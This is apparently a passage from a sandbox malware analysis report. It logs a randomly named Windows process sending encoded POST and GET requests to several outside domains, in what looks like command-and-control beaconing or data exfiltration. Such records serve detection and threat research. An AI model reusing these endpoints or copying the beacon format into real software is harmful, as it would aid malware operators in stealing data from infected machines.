                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 4761
                                                              Content-Type: text/html; charset=utf-8


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.4 | 49772 | 154.23.176.197 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:34.452281952 CEST | 727 | OUT | POST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:35.362529039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:46 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 4786
                                                              Content-Type: text/html; charset=utf-8


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.4 | 49773 | 154.23.176.197 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:37.000893116 CEST | 10809 | OUT | POST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:38.182912111 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:49 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 12974
                                                              Content-Type: text/html; charset=utf-8


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.4 | 49774 | 154.23.176.197 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:39.542717934 CEST | 436 | OUT | GET /25kr/?3tV=OBaZfyA9mrXrqkerGJdoBE4AUoAB8BDMFL96R6e2a3wywxYSJcqYm8ZoKYyxvhEHyag814v77I5kSeFlkRp9ldlOkmNbRx3b8AF2oRSh5frHPX5DuU6sJMI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:40.502587080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:51 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                              Sep 12, 2024 15:07:40.502619982 CEST | 1236 | IN
                                                              Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
                                                              Sep 12, 2024 15:07:40.502634048 CEST | 1236 | IN
                                                              Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
                                                              Sep 12, 2024 15:07:40.502650023 CEST | 672 | IN
                                                              Data Ascii: line-height: 16px; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{
                                                              Sep 12, 2024 15:07:40.502665997 CEST | 1236 | IN
                                                              Data Ascii: ption-var table caption{ text-align: left; font-size: 16px; font-weight: bold; padding: 6px 0; } .exception-var table caption small{ font-weight: 300; disp
                                                              Sep 12, 2024 15:07:40.502681017 CEST | 1236 | IN
                                                              Data Ascii: #008 } /* a keyword */ pre.prettyprint .com { color: #800 } /* a comment */ pre.prettyprint .typ { color: #606 } /* a type name */ pre.prettyprint .lit { color: #066 } /* a literal value */ /* punctuation, l
                                                              Sep 12, 2024 15:07:40.502705097 CEST | 448 | IN
                                                              Data Ascii: <div><h1>:25kr</h1></div> </div> </div> <div class="source-code"> <pre class="prettyprint lang-php"><ol start="53"><li class="line-53"><code> $available =
                                                              Sep 12, 2024 15:07:40.502718925 CEST | 1236 | IN
                                                              Data Ascii: if ($module &amp;&amp; $available) {</code></li><li class="line-58"><code> // </code></li><li class="line-59"><code> $this-&gt;request-&gt;setModule($module);</code></li><li class="li
                                                              Sep 12, 2024 15:07:40.502733946 CEST | 224 | IN
                                                              Data Ascii: e></li></ol></pre> </div> <div class="trace"> <h2>Call Stack</h2> <ol> <li>in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/
                                                              Sep 12, 2024 15:07:40.502748966 CEST | 1236 | IN
                                                              Data Ascii: route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="think\route\dispatch\Module">Module</abbr>->init() in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuank
                                                              Sep 12, 2024 15:07:40.507617950 CEST | 1236 | IN
                                                              Data Ascii: 4AUoAB8BDMFL96R6e2a3wywxYSJcqYm8ZoKYyxvhEHyag814v77I5kSeFlkRp9ldlOkmNbRx3b8AF2oRSh5frHPX5DuU6sJMI= </td> </tr> <tr> <td>IhkTb</td> <td>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.4 | 49775 | 45.113.201.77 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:46.266565084 CEST | 701 | OUT | POST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=9lc+skjEWqrNuN5OBIK0S/xEeNl4g4pWhqGCfe855+8PN0q603HXnClTYlsCMW4DnVOsbl2hMWEtRCAYzl1rw+RC7BSlHEzrQfzIVtoFiVW3WTEy6aF66Kap8qWZQOhfKeYlsHv44phcWKi/Qs9RWzgCzF0dvx1mgpTdUg4p2I6yzgB23zEOlWKAKkOZ/K0ytQ==
                                                              Sep 12, 2024 15:07:47.151875019 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:54 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.4 | 49776 | 45.113.201.77 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:48.807373047 CEST | 721 | OUT | POST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=9lc+skjEWqrN/ehONOC0TfxHVtl4vYpShqKCffp85LsPMRW61zrXiClTA1tGTG4InVSkbh2hMWQtRDwY0WdozOREuRSnIkzrQfzIVtsviVu3Vj0y57F55Kaq7qWZUOgUKeZwsGyt4qZcWLS/T5BOBjgI5l1OhAcfuJm0cy8KwZel2mQsmClZ3WuzXjHtyJJ72TK1S8t8qZmjoLLSsWVgjnU=
                                                              Sep 12, 2024 15:07:49.683084011 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:57 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.4 | 49777 | 45.113.201.77 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:51.355828047 CEST | 10803 | OUT | POST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV= [TRUNCATED]
                                                              Sep 12, 2024 15:07:52.206064939 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:59 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.4 | 49778 | 45.113.201.77 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:54.644417048 CEST | 434 | OUT | GET /78aq/?IhkTb=xPfHG0o8kZI8&3tV=wn0evRzkTpjhxs8ZI7f7bdp7QNRPmMli5Za2X/d72voTd3Hgl3DgiTlHV2cFEBs8tUuCcCOjEkMrQzdfzw17g/NW6ia3GXbmRujRfaIyiSnkayos5qIY2c4= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:55.525688887 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:08:03 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.4 | 49779 | 76.223.113.161 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:08:00.604260921 CEST | 692 | OUT | POST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=NqM8WKsJC2iaFwKeCODOpShYvfSUi7RKBUlZV3VfM1qHi+UW1pyxra+P8szQjQDvQeJFa/LkEuWvDi+mRkefYsMhx70UZ7ZEDZSkvAtVLumbEf6xawZDPaeSPkuBhWbg3jb0u2mHkY+ocuMMwYniytYu2rddsBZeG7/NemaG53RvpiDDoeP+U8fvDXZg4e9DDA==
                                                              Sep 12, 2024 15:08:01.062894106 CEST | 208 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:01 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.4 | 49780 | 76.223.113.161 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:08:03.156893015 CEST | 712 | OUT | POST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=NqM8WKsJC2iaEQ6eAtrOsyhfj/SUtbROBU5ZVzEaMDSHs/kW0oyxm6+PyMzV+ADaQeUya+bkEuCvDjOmRTycZ8Mj7r0aGrZEDZSkvA5vLvObHvKxbRZAC6eNHEuBs2aI3jbau37PkbGocrwMxJnhldYoorcu9Bw5K7uWUWGSw3kOlESZ5vupG87ceQQU1dAKYMtayUYYO2ZT0+od+nh26/s=
                                                              Sep 12, 2024 15:08:03.599111080 CEST  208  IN  HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:03 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              39  192.168.2.4  49781  76.223.113.161  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:05.744869947 CEST  10794  OUT  POST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:06.206929922 CEST  208  IN  HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:06 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              40  192.168.2.4  49782  76.223.113.161  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:08.300906897 CEST  431  OUT  GET /n3rq/?3tV=AokcV8lrD1iGOQWcBcmCrANBpf6sr5VfHV9HQUhaLRmf3Oh9ttLkjbrN5cmv13PiDvU4asCjKcP/FjbrfTOvR8dEp5E+Erc+ELSxl31AK9blM+O7DS4CIrs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:08.786214113 CEST  208  IN  HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:08 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              41  192.168.2.4  49783  84.32.84.37  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:22.194998980 CEST  713  OUT  POST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=o+TH4kwIMR9WpHWIQOLkAuVGKu1Hbds5pbYp2mBx102aJaovqALmGQMMeHHMkpCrmFv5fp4a1iCM9wSEq+GzN93HcfFFQAv18ZXfAzcZ+x+BNdgSqhuXquvpLeedMvb2z6ZCgfCG822gib3J0Is4ZkzvF3h6uGrZmVacYZLXTpWrVCTpSA6VMwNSOtjhYigiLw==
                                                              Sep 12, 2024 15:08:22.878165960 CEST  1232  IN  HTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 28e8f9bea0a6c943c856b91cf6684e21-bos-edge3
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.235
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              42  192.168.2.4  49784  84.32.84.37  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:24.750397921 CEST  733  OUT  POST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=o+TH4kwIMR9W73mITtjkFOVHXe1HANs9pbUp2nUq1GSaO/svrEnmTQMMKXHQpJDnmFiGfpEa1iWM91WEqN+wf93FV/FHfgv18ZXfA38z+xGBNMQSrFyY0evqb+edGPbyz6Zggai88z6gibHJ0Zs7XUzpLXgutDaOpwTqTIPLK6CbQECzDxbCewphTqqVVhdrQwygbqVxhOMu4nZ79VJn7kg=
                                                              Sep 12, 2024 15:08:25.443216085 CEST  1232  IN  HTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 42f036d3443d12a4bcfb5817367a14be-bos-edge1
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.231
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              43  192.168.2.4  49785  84.32.84.37  80  5084  C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Sep 12, 2024 15:08:27.299057961 CEST  10815  OUT  POST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:27.981729031 CEST  1232  IN  HTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 0e436f4ac93e9a39a6da3d7deb691ac8-bos-edge1
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.232
